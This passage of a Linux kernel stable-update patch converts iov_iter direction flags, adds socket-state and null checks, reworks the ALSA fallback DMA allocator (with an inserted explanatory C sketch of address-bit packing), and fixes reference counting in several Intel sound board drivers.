+ 	return xs_sock_recvmsg(sock, msg, flags, seek);
+ }
+ 
+@@ -373,7 +373,7 @@ xs_read_bvec(struct socket *sock, struct msghdr *msg, int flags,
+ 		struct bio_vec *bvec, unsigned long nr, size_t count,
+ 		size_t seek)
+ {
+-	iov_iter_bvec(&msg->msg_iter, READ, bvec, nr, count);
++	iov_iter_bvec(&msg->msg_iter, ITER_DEST, bvec, nr, count);
+ 	return xs_sock_recvmsg(sock, msg, flags, seek);
+ }
+ 
+@@ -381,7 +381,7 @@ static ssize_t
+ xs_read_discard(struct socket *sock, struct msghdr *msg, int flags,
+ 		size_t count)
+ {
+-	iov_iter_discard(&msg->msg_iter, READ, count);
++	iov_iter_discard(&msg->msg_iter, ITER_DEST, count);
+ 	return sock_recvmsg(sock, msg, flags);
+ }
+ 
+diff --git a/net/tipc/topsrv.c b/net/tipc/topsrv.c
+index e3b427a703980..69c88cc03887d 100644
+--- a/net/tipc/topsrv.c
++++ b/net/tipc/topsrv.c
+@@ -396,7 +396,7 @@ static int tipc_conn_rcv_from_sock(struct tipc_conn *con)
+ 	iov.iov_base = &s;
+ 	iov.iov_len = sizeof(s);
+ 	msg.msg_name = NULL;
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, iov.iov_len);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, iov.iov_len);
+ 	ret = sock_recvmsg(con->sock, &msg, MSG_DONTWAIT);
+ 	if (ret == -EWOULDBLOCK)
+ 		return -EWOULDBLOCK;
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index a03d66046ca32..6c593788dc250 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -620,7 +620,7 @@ int tls_device_sendpage(struct sock *sk, struct page *page,
+ 	kaddr = kmap(page);
+ 	iov.iov_base = kaddr + offset;
+ 	iov.iov_len = size;
+-	iov_iter_kvec(&msg_iter, WRITE, &iov, 1, size);
++	iov_iter_kvec(&msg_iter, ITER_SOURCE, &iov, 1, size);
+ 	iter_offset.msg_iter = &msg_iter;
+ 	rc = tls_push_data(sk, iter_offset, size, flags, TLS_RECORD_TYPE_DATA,
+ 			   NULL);
+@@ -697,7 +697,7 @@ static int tls_device_push_pending_record(struct sock *sk, int flags)
+ 	union tls_iter_offset iter;
+ 	struct iov_iter msg_iter;
+ 
+-	iov_iter_kvec(&msg_iter, WRITE, NULL, 0, 0);
++	iov_iter_kvec(&msg_iter, ITER_SOURCE, NULL, 0, 0);
+ 	iter.msg_iter = &msg_iter;
+ 	return tls_push_data(sk, iter, 0, flags, TLS_RECORD_TYPE_DATA, NULL);
+ }
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 9ed9786341259..a83d2b4275fa6 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -2427,7 +2427,7 @@ static bool tls_is_tx_ready(struct tls_sw_context_tx *ctx)
+ {
+ 	struct tls_rec *rec;
+ 
+-	rec = list_first_entry(&ctx->tx_list, struct tls_rec, list);
++	rec = list_first_entry_or_null(&ctx->tx_list, struct tls_rec, list);
+ 	if (!rec)
+ 		return false;
+ 
+diff --git a/net/x25/af_x25.c b/net/x25/af_x25.c
+index 3b55502b29657..5c7ad301d742e 100644
+--- a/net/x25/af_x25.c
++++ b/net/x25/af_x25.c
+@@ -482,6 +482,12 @@ static int x25_listen(struct socket *sock, int backlog)
+ 	int rc = -EOPNOTSUPP;
+ 
+ 	lock_sock(sk);
++	if (sock->state != SS_UNCONNECTED) {
++		rc = -EINVAL;
++		release_sock(sk);
++		return rc;
++	}
++
+ 	if (sk->sk_state != TCP_LISTEN) {
+ 		memset(&x25_sk(sk)->dest_addr, 0, X25_ADDR_LEN);
+ 		sk->sk_max_ack_backlog = backlog;
+diff --git a/net/xfrm/espintcp.c b/net/xfrm/espintcp.c
+index 29a540dcb5a71..d6fece1ed982d 100644
+--- a/net/xfrm/espintcp.c
++++ b/net/xfrm/espintcp.c
+@@ -354,7 +354,7 @@ static int espintcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 	*((__be16 *)buf) = cpu_to_be16(msglen);
+ 	pfx_iov.iov_base = buf;
+ 	pfx_iov.iov_len = sizeof(buf);
+-	iov_iter_kvec(&pfx_iter, WRITE, &pfx_iov, 1, pfx_iov.iov_len);
++	iov_iter_kvec(&pfx_iter, ITER_SOURCE, &pfx_iov, 1, pfx_iov.iov_len);
+ 
+ 	err = sk_msg_memcopy_from_iter(sk, &pfx_iter, &emsg->skmsg,
+ 				       pfx_iov.iov_len);
+diff --git a/scripts/Makefile.modinst b/scripts/Makefile.modinst
+index a4c987c23750f..10df89b9ef679 100644
+--- a/scripts/Makefile.modinst
++++ b/scripts/Makefile.modinst
+@@ -66,9 +66,13 @@ endif
+ # Don't stop modules_install even if we can't sign external modules.
+ #
+ ifeq ($(CONFIG_MODULE_SIG_ALL),y)
++ifeq ($(filter pkcs11:%, $(CONFIG_MODULE_SIG_KEY)),)
+ sig-key := $(if $(wildcard $(CONFIG_MODULE_SIG_KEY)),,$(srctree)/)$(CONFIG_MODULE_SIG_KEY)
++else
++sig-key := $(CONFIG_MODULE_SIG_KEY)
++endif
+ quiet_cmd_sign = SIGN    $@
+-      cmd_sign = scripts/sign-file $(CONFIG_MODULE_SIG_HASH) $(sig-key) certs/signing_key.x509 $@ \
++      cmd_sign = scripts/sign-file $(CONFIG_MODULE_SIG_HASH) "$(sig-key)" certs/signing_key.x509 $@ \
+                  $(if $(KBUILD_EXTMOD),|| true)
+ else
+ quiet_cmd_sign :=
+diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
+index 96a92a645216d..d54f73c558f72 100644
+--- a/security/keys/keyctl.c
++++ b/security/keys/keyctl.c
+@@ -1251,7 +1251,7 @@ long keyctl_instantiate_key(key_serial_t id,
+ 		struct iov_iter from;
+ 		int ret;
+ 
+-		ret = import_single_range(WRITE, (void __user *)_payload, plen,
++		ret = import_single_range(ITER_SOURCE, (void __user *)_payload, plen,
+ 					  &iov, &from);
+ 		if (unlikely(ret))
+ 			return ret;
+@@ -1283,7 +1283,7 @@ long keyctl_instantiate_key_iov(key_serial_t id,
+ 	if (!_payload_iov)
+ 		ioc = 0;
+ 
+-	ret = import_iovec(WRITE, _payload_iov, ioc,
++	ret = import_iovec(ITER_SOURCE, _payload_iov, ioc,
+ 				    ARRAY_SIZE(iovstack), &iov, &from);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/sound/core/memalloc.c b/sound/core/memalloc.c
+index 7268304009ada..11ff1ee51345c 100644
+--- a/sound/core/memalloc.c
++++ b/sound/core/memalloc.c
+@@ -542,16 +542,15 @@ static void *snd_dma_noncontig_alloc(struct snd_dma_buffer *dmab, size_t size)
+ 	struct sg_table *sgt;
+ 	void *p;
+ 
++#ifdef CONFIG_SND_DMA_SGBUF
++	if (cpu_feature_enabled(X86_FEATURE_XENPV))
++		return snd_dma_sg_fallback_alloc(dmab, size);
++#endif
+ 	sgt = dma_alloc_noncontiguous(dmab->dev.dev, size, dmab->dev.dir,
+ 				      DEFAULT_GFP, 0);
+ #ifdef CONFIG_SND_DMA_SGBUF
+-	if (!sgt && !get_dma_ops(dmab->dev.dev)) {
+-		if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG)
+-			dmab->dev.type = SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
+-		else
+-			dmab->dev.type = SNDRV_DMA_TYPE_DEV_SG_FALLBACK;
++	if (!sgt && !get_dma_ops(dmab->dev.dev))
+ 		return snd_dma_sg_fallback_alloc(dmab, size);
+-	}
+ #endif
+ 	if (!sgt)
+ 		return NULL;
+@@ -718,19 +717,38 @@ static const struct snd_malloc_ops snd_dma_sg_wc_ops = {
+ 
+ /* Fallback SG-buffer allocations for x86 */
+ struct snd_dma_sg_fallback {
++	bool use_dma_alloc_coherent;
+ 	size_t count;
+ 	struct page **pages;
++	/* DMA address array; the first page contains #pages in ~PAGE_MASK */
++	dma_addr_t *addrs;
+ };
+ 
+ static void __snd_dma_sg_fallback_free(struct snd_dma_buffer *dmab,
+ 				       struct snd_dma_sg_fallback *sgbuf)
+ {
+-	bool wc = dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
+-	size_t i;
+-
+-	for (i = 0; i < sgbuf->count && sgbuf->pages[i]; i++)
+-		do_free_pages(page_address(sgbuf->pages[i]), PAGE_SIZE, wc);
++	size_t i, size;
++
++	if (sgbuf->pages && sgbuf->addrs) {
++		i = 0;
++		while (i < sgbuf->count) {
++			if (!sgbuf->pages[i] || !sgbuf->addrs[i])
++				break;
++			size = sgbuf->addrs[i] & ~PAGE_MASK;
++			if (WARN_ON(!size))
++				break;
++			if (sgbuf->use_dma_alloc_coherent)
++				dma_free_coherent(dmab->dev.dev, size << PAGE_SHIFT,
++						  page_address(sgbuf->pages[i]),
++						  sgbuf->addrs[i] & PAGE_MASK);
++			else
++				do_free_pages(page_address(sgbuf->pages[i]),
++					      size << PAGE_SHIFT, false);
++			i += size;
++		}
++	}
+ 	kvfree(sgbuf->pages);
++	kvfree(sgbuf->addrs);
+ 	kfree(sgbuf);
+ }
+ 
+@@ -739,24 +757,36 @@ static void *snd_dma_sg_fallback_alloc(struct snd_dma_buffer *dmab, size_t size)
+ 	struct snd_dma_sg_fallback *sgbuf;
+ 	struct page **pagep, *curp;
+ 	size_t chunk, npages;
++	dma_addr_t *addrp;
+ 	dma_addr_t addr;
+ 	void *p;
+-	bool wc = dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
++
++	/* correct the type */
++	if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_SG)
++		dmab->dev.type = SNDRV_DMA_TYPE_DEV_SG_FALLBACK;
++	else if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG)
++		dmab->dev.type = SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
+ 
+ 	sgbuf = kzalloc(sizeof(*sgbuf), GFP_KERNEL);
+ 	if (!sgbuf)
+ 		return NULL;
++	sgbuf->use_dma_alloc_coherent = cpu_feature_enabled(X86_FEATURE_XENPV);
+ 	size = PAGE_ALIGN(size);
+ 	sgbuf->count = size >> PAGE_SHIFT;
+ 	sgbuf->pages = kvcalloc(sgbuf->count, sizeof(*sgbuf->pages), GFP_KERNEL);
+-	if (!sgbuf->pages)
++	sgbuf->addrs = kvcalloc(sgbuf->count, sizeof(*sgbuf->addrs), GFP_KERNEL);
++	if (!sgbuf->pages || !sgbuf->addrs)
+ 		goto error;
+ 
+ 	pagep = sgbuf->pages;
+-	chunk = size;
++	addrp = sgbuf->addrs;
++	chunk = (PAGE_SIZE - 1) << PAGE_SHIFT; /* to fit in low bits in addrs */
+ 	while (size > 0) {
+ 		chunk = min(size, chunk);
+-		p = do_alloc_pages(dmab->dev.dev, chunk, &addr, wc);
++		if (sgbuf->use_dma_alloc_coherent)
++			p = dma_alloc_coherent(dmab->dev.dev, chunk, &addr, DEFAULT_GFP);
++		else
++			p = do_alloc_pages(dmab->dev.dev, chunk, &addr, false);
+ 		if (!p) {
+ 			if (chunk <= PAGE_SIZE)
+ 				goto error;
+@@ -768,17 +798,25 @@ static void *snd_dma_sg_fallback_alloc(struct snd_dma_buffer *dmab, size_t size)
+ 		size -= chunk;
+ 		/* fill pages */
+ 		npages = chunk >> PAGE_SHIFT;
++		*addrp = npages; /* store in lower bits */
+ 		curp = virt_to_page(p);
+-		while (npages--)
++		while (npages--) {
+ 			*pagep++ = curp++;
++			*addrp++ |= addr;
++			addr += PAGE_SIZE;
++		}
+ 	}
+ 
+ 	p = vmap(sgbuf->pages, sgbuf->count, VM_MAP, PAGE_KERNEL);
+ 	if (!p)
+ 		goto error;
++
++	if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK)
++		set_pages_array_wc(sgbuf->pages, sgbuf->count);
++
+ 	dmab->private_data = sgbuf;
+ 	/* store the first page address for convenience */
+-	dmab->addr = snd_sgbuf_get_addr(dmab, 0);
++	dmab->addr = sgbuf->addrs[0] & PAGE_MASK;
+ 	return p;
+ 
+  error:
+@@ -788,10 +826,23 @@ static void *snd_dma_sg_fallback_alloc(struct snd_dma_buffer *dmab, size_t size)
+ 
+ static void snd_dma_sg_fallback_free(struct snd_dma_buffer *dmab)
+ {
++	struct snd_dma_sg_fallback *sgbuf = dmab->private_data;
++
++	if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK)
++		set_pages_array_wb(sgbuf->pages, sgbuf->count);
+ 	vunmap(dmab->area);
+ 	__snd_dma_sg_fallback_free(dmab, dmab->private_data);
+ }
+ 
++static dma_addr_t snd_dma_sg_fallback_get_addr(struct snd_dma_buffer *dmab,
++					       size_t offset)
++{
++	struct snd_dma_sg_fallback *sgbuf = dmab->private_data;
++	size_t index = offset >> PAGE_SHIFT;
++
++	return (sgbuf->addrs[index] & PAGE_MASK) | (offset & ~PAGE_MASK);
++}
++
+ static int snd_dma_sg_fallback_mmap(struct snd_dma_buffer *dmab,
+ 				    struct vm_area_struct *area)
+ {
+@@ -806,8 +857,8 @@ static const struct snd_malloc_ops snd_dma_sg_fallback_ops = {
+ 	.alloc = snd_dma_sg_fallback_alloc,
+ 	.free = snd_dma_sg_fallback_free,
+ 	.mmap = snd_dma_sg_fallback_mmap,
++	.get_addr = snd_dma_sg_fallback_get_addr,
+ 	/* reuse vmalloc helpers */
+-	.get_addr = snd_dma_vmalloc_get_addr,
+ 	.get_page = snd_dma_vmalloc_get_page,
+ 	.get_chunk_size = snd_dma_vmalloc_get_chunk_size,
+ };
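+
+[The reworked ALSA fallback allocator above stores per-chunk metadata in-band: the DMA address of a page-aligned chunk has its low PAGE_SHIFT bits clear, so the chunk's page count is stashed in those bits of its first addrs[] entry and masked back out on free -- which is also why chunk sizes are capped at (PAGE_SIZE - 1) << PAGE_SHIFT. A standalone sketch of the packing, assuming 4 KiB pages:
+
+#include <stdint.h>
+#include <stdio.h>
+
+#define PAGE_SHIFT 12			/* assumes 4 KiB pages */
+#define PAGE_SIZE  (1ULL << PAGE_SHIFT)
+#define PAGE_MASK  (~(PAGE_SIZE - 1))
+
+int main(void)
+{
+	uint64_t addr = 0x7f12345000ULL;	/* page-aligned chunk address */
+	uint64_t npages = 3;			/* chunk spans three pages */
+
+	/* low PAGE_SHIFT bits of a page-aligned address are free to use */
+	uint64_t packed = addr | npages;
+
+	printf("addr   = %#llx\n", (unsigned long long)(packed & PAGE_MASK));
+	printf("npages = %llu\n",  (unsigned long long)(packed & ~PAGE_MASK));
+	return 0;
+}
+
+This is the same trick snd_dma_sg_fallback_get_addr() relies on when translating a buffer offset back to a DMA address.]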
+diff --git a/sound/firewire/motu/motu-hwdep.c b/sound/firewire/motu/motu-hwdep.c
+index a900fc0e76440..88d1f4b56e4be 100644
+--- a/sound/firewire/motu/motu-hwdep.c
++++ b/sound/firewire/motu/motu-hwdep.c
+@@ -87,6 +87,10 @@ static long hwdep_read(struct snd_hwdep *hwdep, char __user *buf, long count,
+ 			return -EFAULT;
+ 
+ 		count = consumed;
++	} else {
++		spin_unlock_irq(&motu->lock);
++
++		count = 0;
+ 	}
+ 
+ 	return count;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 6fab7c8fc19ae..db9518de9343c 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9202,6 +9202,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1025, 0x142b, "Acer Swift SF314-42", ALC255_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x1430, "Acer TravelMate B311R-31", ALC256_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x1466, "Acer Aspire A515-56", ALC255_FIXUP_ACER_HEADPHONE_AND_MIC),
++	SND_PCI_QUIRK(0x1025, 0x1534, "Acer Predator PH315-54", ALC255_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x0470, "Dell M101z", ALC269_FIXUP_DELL_M101Z),
+ 	SND_PCI_QUIRK(0x1028, 0x053c, "Dell Latitude E5430", ALC292_FIXUP_DELL_E7X),
+ 	SND_PCI_QUIRK(0x1028, 0x054b, "Dell XPS one 2710", ALC275_FIXUP_DELL_XPS),
+@@ -9432,6 +9433,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+diff --git a/sound/pci/hda/patch_via.c b/sound/pci/hda/patch_via.c
+index aea7fae2ca4b2..2994f85bc1b9a 100644
+--- a/sound/pci/hda/patch_via.c
++++ b/sound/pci/hda/patch_via.c
+@@ -819,6 +819,9 @@ static int add_secret_dac_path(struct hda_codec *codec)
+ 		return 0;
+ 	nums = snd_hda_get_connections(codec, spec->gen.mixer_nid, conn,
+ 				       ARRAY_SIZE(conn) - 1);
++	if (nums < 0)
++		return nums;
++
+ 	for (i = 0; i < nums; i++) {
+ 		if (get_wcaps_type(get_wcaps(codec, conn[i])) == AC_WID_AUD_OUT)
+ 			return 0;
+diff --git a/sound/soc/amd/acp-es8336.c b/sound/soc/amd/acp-es8336.c
+index 2fe8df86053ae..89499542c803f 100644
+--- a/sound/soc/amd/acp-es8336.c
++++ b/sound/soc/amd/acp-es8336.c
+@@ -198,9 +198,11 @@ static int st_es8336_late_probe(struct snd_soc_card *card)
+ 	int ret;
+ 
+ 	adev = acpi_dev_get_first_match_dev("ESSX8336", NULL, -1);
+-	if (adev)
+-		put_device(&adev->dev);
++	if (!adev)
++		return -ENODEV;
++
+ 	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
+ 	if (!codec_dev)
+ 		dev_err(card->dev, "can not find codec dev\n");
+ 
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index 0ddb6362fcc52..2533d0973529f 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1359,8 +1359,8 @@ static struct snd_soc_dai_driver wsa883x_dais[] = {
+ 			.stream_name = "SPKR Playback",
+ 			.rates = WSA883X_RATES | WSA883X_FRAC_RATES,
+ 			.formats = WSA883X_FORMATS,
+-			.rate_max = 8000,
+-			.rate_min = 352800,
++			.rate_min = 8000,
++			.rate_max = 352800,
+ 			.channels_min = 1,
+ 			.channels_max = 1,
+ 		},
+diff --git a/sound/soc/intel/avs/core.c b/sound/soc/intel/avs/core.c
+index 4f93639ce4887..5bb3eee2f7838 100644
+--- a/sound/soc/intel/avs/core.c
++++ b/sound/soc/intel/avs/core.c
+@@ -476,6 +476,29 @@ err_remap_bar0:
+ 	return ret;
+ }
+ 
++static void avs_pci_shutdown(struct pci_dev *pci)
++{
++	struct hdac_bus *bus = pci_get_drvdata(pci);
++	struct avs_dev *adev = hdac_to_avs(bus);
++
++	cancel_work_sync(&adev->probe_work);
++	avs_ipc_block(adev->ipc);
++
++	snd_hdac_stop_streams(bus);
++	avs_dsp_op(adev, int_control, false);
++	snd_hdac_ext_bus_ppcap_int_enable(bus, false);
++	snd_hdac_ext_bus_link_power_down_all(bus);
++
++	snd_hdac_bus_stop_chip(bus);
++	snd_hdac_display_power(bus, HDA_CODEC_IDX_CONTROLLER, false);
++
++	if (avs_platattr_test(adev, CLDMA))
++		pci_free_irq(pci, 0, &code_loader);
++	pci_free_irq(pci, 0, adev);
++	pci_free_irq(pci, 0, bus);
++	pci_free_irq_vectors(pci);
++}
++
+ static void avs_pci_remove(struct pci_dev *pci)
+ {
+ 	struct hdac_device *hdev, *save;
+@@ -679,6 +702,7 @@ static struct pci_driver avs_pci_driver = {
+ 	.id_table = avs_ids,
+ 	.probe = avs_pci_probe,
+ 	.remove = avs_pci_remove,
++	.shutdown = avs_pci_shutdown,
+ 	.driver = {
+ 		.pm = &avs_dev_pm,
+ 	},
+diff --git a/sound/soc/intel/boards/bytcht_es8316.c b/sound/soc/intel/boards/bytcht_es8316.c
+index a935c5fd9edbc..4dd37848b30e3 100644
+--- a/sound/soc/intel/boards/bytcht_es8316.c
++++ b/sound/soc/intel/boards/bytcht_es8316.c
+@@ -497,21 +497,28 @@ static int snd_byt_cht_es8316_mc_probe(struct platform_device *pdev)
+ 	if (adev) {
+ 		snprintf(codec_name, sizeof(codec_name),
+ 			 "i2c-%s", acpi_dev_name(adev));
+-		put_device(&adev->dev);
+ 		byt_cht_es8316_dais[dai_index].codecs->name = codec_name;
+ 	} else {
+ 		dev_err(dev, "Error cannot find '%s' dev\n", mach->id);
+ 		return -ENXIO;
+ 	}
+ 
++	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
++	if (!codec_dev)
++		return -EPROBE_DEFER;
++	priv->codec_dev = get_device(codec_dev);
++
+ 	/* override platform name, if required */
+ 	byt_cht_es8316_card.dev = dev;
+ 	platform_name = mach->mach_params.platform;
+ 
+ 	ret = snd_soc_fixup_dai_links_platform_name(&byt_cht_es8316_card,
+ 						    platform_name);
+-	if (ret)
++	if (ret) {
++		put_device(codec_dev);
+ 		return ret;
++	}
+ 
+ 	/* Check for BYTCR or other platform and setup quirks */
+ 	dmi_id = dmi_first_match(byt_cht_es8316_quirk_table);
+@@ -539,13 +546,10 @@ static int snd_byt_cht_es8316_mc_probe(struct platform_device *pdev)
+ 
+ 	/* get the clock */
+ 	priv->mclk = devm_clk_get(dev, "pmc_plt_clk_3");
+-	if (IS_ERR(priv->mclk))
++	if (IS_ERR(priv->mclk)) {
++		put_device(codec_dev);
+ 		return dev_err_probe(dev, PTR_ERR(priv->mclk), "clk_get pmc_plt_clk_3 failed\n");
+-
+-	codec_dev = acpi_get_first_physical_node(adev);
+-	if (!codec_dev)
+-		return -EPROBE_DEFER;
+-	priv->codec_dev = get_device(codec_dev);
++	}
+ 
+ 	if (quirk & BYT_CHT_ES8316_JD_INVERTED)
+ 		props[cnt++] = PROPERTY_ENTRY_BOOL("everest,jack-detect-inverted");
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index ddd2625bed90d..4f46f52c38e44 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -1626,13 +1626,18 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 	if (adev) {
+ 		snprintf(byt_rt5640_codec_name, sizeof(byt_rt5640_codec_name),
+ 			 "i2c-%s", acpi_dev_name(adev));
+-		put_device(&adev->dev);
+ 		byt_rt5640_dais[dai_index].codecs->name = byt_rt5640_codec_name;
+ 	} else {
+ 		dev_err(dev, "Error cannot find '%s' dev\n", mach->id);
+ 		return -ENXIO;
+ 	}
+ 
++	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
++	if (!codec_dev)
++		return -EPROBE_DEFER;
++	priv->codec_dev = get_device(codec_dev);
++
+ 	/*
+ 	 * swap SSP0 if bytcr is detected
+ 	 * (will be overridden if DMI quirk is detected)
+@@ -1707,11 +1712,6 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 		byt_rt5640_quirk = quirk_override;
+ 	}
+ 
+-	codec_dev = acpi_get_first_physical_node(adev);
+-	if (!codec_dev)
+-		return -EPROBE_DEFER;
+-	priv->codec_dev = get_device(codec_dev);
+-
+ 	if (byt_rt5640_quirk & BYT_RT5640_JD_HP_ELITEP_1000G2) {
+ 		acpi_dev_add_driver_gpios(ACPI_COMPANION(priv->codec_dev),
+ 					  byt_rt5640_hp_elitepad_1000g2_gpios);
+diff --git a/sound/soc/intel/boards/bytcr_rt5651.c b/sound/soc/intel/boards/bytcr_rt5651.c
+index 2beb686768f24..d74d184e1c7f3 100644
+--- a/sound/soc/intel/boards/bytcr_rt5651.c
++++ b/sound/soc/intel/boards/bytcr_rt5651.c
+@@ -922,7 +922,6 @@ static int snd_byt_rt5651_mc_probe(struct platform_device *pdev)
+ 	if (adev) {
+ 		snprintf(byt_rt5651_codec_name, sizeof(byt_rt5651_codec_name),
+ 			 "i2c-%s", acpi_dev_name(adev));
+-		put_device(&adev->dev);
+ 		byt_rt5651_dais[dai_index].codecs->name = byt_rt5651_codec_name;
+ 	} else {
+ 		dev_err(dev, "Error cannot find '%s' dev\n", mach->id);
+@@ -930,6 +929,7 @@ static int snd_byt_rt5651_mc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
+ 	if (!codec_dev)
+ 		return -EPROBE_DEFER;
+ 	priv->codec_dev = get_device(codec_dev);
+diff --git a/sound/soc/intel/boards/bytcr_wm5102.c b/sound/soc/intel/boards/bytcr_wm5102.c
+index 45a6805787f56..f8da1bcd010ed 100644
+--- a/sound/soc/intel/boards/bytcr_wm5102.c
++++ b/sound/soc/intel/boards/bytcr_wm5102.c
+@@ -411,9 +411,9 @@ static int snd_byt_wm5102_mc_probe(struct platform_device *pdev)
+ 		return -ENOENT;
+ 	}
+ 	snprintf(codec_name, sizeof(codec_name), "spi-%s", acpi_dev_name(adev));
+-	put_device(&adev->dev);
+ 
+ 	codec_dev = bus_find_device_by_name(&spi_bus_type, NULL, codec_name);
++	acpi_dev_put(adev);
+ 	if (!codec_dev)
+ 		return -EPROBE_DEFER;
+ 
+diff --git a/sound/soc/intel/boards/sof_es8336.c b/sound/soc/intel/boards/sof_es8336.c
+index 773e5d1d87d46..894b6610b9e27 100644
+--- a/sound/soc/intel/boards/sof_es8336.c
++++ b/sound/soc/intel/boards/sof_es8336.c
+@@ -681,7 +681,6 @@ static int sof_es8336_probe(struct platform_device *pdev)
+ 	if (adev) {
+ 		snprintf(codec_name, sizeof(codec_name),
+ 			 "i2c-%s", acpi_dev_name(adev));
+-		put_device(&adev->dev);
+ 		dai_links[0].codecs->name = codec_name;
+ 
+ 		/* also fixup codec dai name if relevant */
+@@ -692,16 +691,19 @@ static int sof_es8336_probe(struct platform_device *pdev)
+ 		return -ENXIO;
+ 	}
+ 
+-	ret = snd_soc_fixup_dai_links_platform_name(&sof_es8336_card,
+-						    mach->mach_params.platform);
+-	if (ret)
+-		return ret;
+-
+ 	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
+ 	if (!codec_dev)
+ 		return -EPROBE_DEFER;
+ 	priv->codec_dev = get_device(codec_dev);
+ 
++	ret = snd_soc_fixup_dai_links_platform_name(&sof_es8336_card,
++						    mach->mach_params.platform);
++	if (ret) {
++		put_device(codec_dev);
++		return ret;
++	}
++
+ 	if (quirk & SOF_ES8336_JD_INVERTED)
+ 		props[cnt++] = PROPERTY_ENTRY_BOOL("everest,jack-detect-inverted");
+ 
+diff --git a/sound/soc/sof/ipc4-mtrace.c b/sound/soc/sof/ipc4-mtrace.c
+index 70dea8ae706e9..0ec6ef681012d 100644
+--- a/sound/soc/sof/ipc4-mtrace.c
++++ b/sound/soc/sof/ipc4-mtrace.c
+@@ -344,9 +344,10 @@ static ssize_t sof_ipc4_priority_mask_dfs_write(struct file *file,
+ 						size_t count, loff_t *ppos)
+ {
+ 	struct sof_mtrace_priv *priv = file->private_data;
+-	int id, ret;
++	unsigned int id;
+ 	char *buf;
+ 	u32 mask;
++	int ret;
+ 
+ 	/*
+ 	 * To update Nth mask entry, write:
+@@ -357,9 +358,9 @@ static ssize_t sof_ipc4_priority_mask_dfs_write(struct file *file,
+ 	if (IS_ERR(buf))
+ 		return PTR_ERR(buf);
+ 
+-	ret = sscanf(buf, "%d,0x%x", &id, &mask);
++	ret = sscanf(buf, "%u,0x%x", &id, &mask);
+ 	if (ret != 2) {
+-		ret = sscanf(buf, "%d,%x", &id, &mask);
++		ret = sscanf(buf, "%u,%x", &id, &mask);
+ 		if (ret != 2) {
+ 			ret = -EINVAL;
+ 			goto out;
+diff --git a/sound/soc/sof/sof-audio.c b/sound/soc/sof/sof-audio.c
+index 62092e2d609c7..2df433c6ef55f 100644
+--- a/sound/soc/sof/sof-audio.c
++++ b/sound/soc/sof/sof-audio.c
+@@ -271,9 +271,9 @@ sof_unprepare_widgets_in_path(struct snd_sof_dev *sdev, struct snd_soc_dapm_widg
+ 	struct snd_sof_widget *swidget = widget->dobj.private;
+ 	struct snd_soc_dapm_path *p;
+ 
+-	/* return if the widget is in use or if it is already unprepared */
+-	if (!swidget->prepared || swidget->use_count > 1)
+-		return;
++	/* skip if the widget is in use or if it is already unprepared */
++	if (!swidget || !swidget->prepared || swidget->use_count > 0)
++		goto sink_unprepare;
+ 
+ 	if (widget_ops[widget->id].ipc_unprepare)
+ 		/* unprepare the source widget */
